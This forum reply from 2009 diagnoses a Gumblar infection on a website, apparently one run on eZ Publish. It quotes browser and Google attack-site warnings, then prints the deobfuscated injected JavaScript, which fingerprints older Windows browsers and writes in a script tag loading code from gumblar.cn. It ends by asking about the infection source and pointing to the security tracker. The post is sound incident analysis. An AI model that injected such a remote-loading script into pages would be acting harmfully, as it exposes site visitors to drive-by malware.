| Monday 11 May 2009 12:10:57 pm 
                                                                 yes, opening the page here on linux gives me a warning from firefox about: 
This web site at gumblar.cn has been reported as an attack site and has been blocked based on your security preferences.
 google: 
Of the 2 pages we tested on the site over the past 90 days, 0 page(s) resulted in malicious software being downloaded and installed without user consent. The last time Google visited this site was on 2009-05-06, and the last time suspicious content was found on this site was on 2009-05-06.
Malicious software includes 963 scripting exploit(s), 6 trojan(s).
This site was hosted on 1 network(s) including AS42831 (UKSERVERS).
 switching the eval to alert gives you the code in plain text something like this: 
var a="ScriptEngine",b="Version()+",j="",u=navigator.userAgent;
if((u.indexOf("Win")>0)&&(u.indexOf("NT 6")<0)&&(document.cookie.indexOf("miek=1")<0)&&(typeof(zrvzts)!=typeof("A")))
{
zrvzts="A";
eval("if(window."+a+")j=j+"+a+"Major"+b+a+"Minor"+b+a+"Build"+b+"j;");
document.write("<script src=//gumblar.cn/rss/id='+j+'><\/script>");
}
So seams to be targeting Windows XP and lower. 
Where does the code come from? user contributed content?Is literal.html enabled? and forgot to use |wash operator in template?
 If this is caused by Exponential security bug, please create an issue in the tracker and mark it as security issue. eZ Online Editor 5: http://projects.ez.no/ezoe || eZJSCore (Ajax): http://projects.ez.no/ezjscore || eZ Publish EE http://ez.no/eZPublish/eZ-Publish-Enterprise-Subscription@: http://twitter.com/andrerom
 |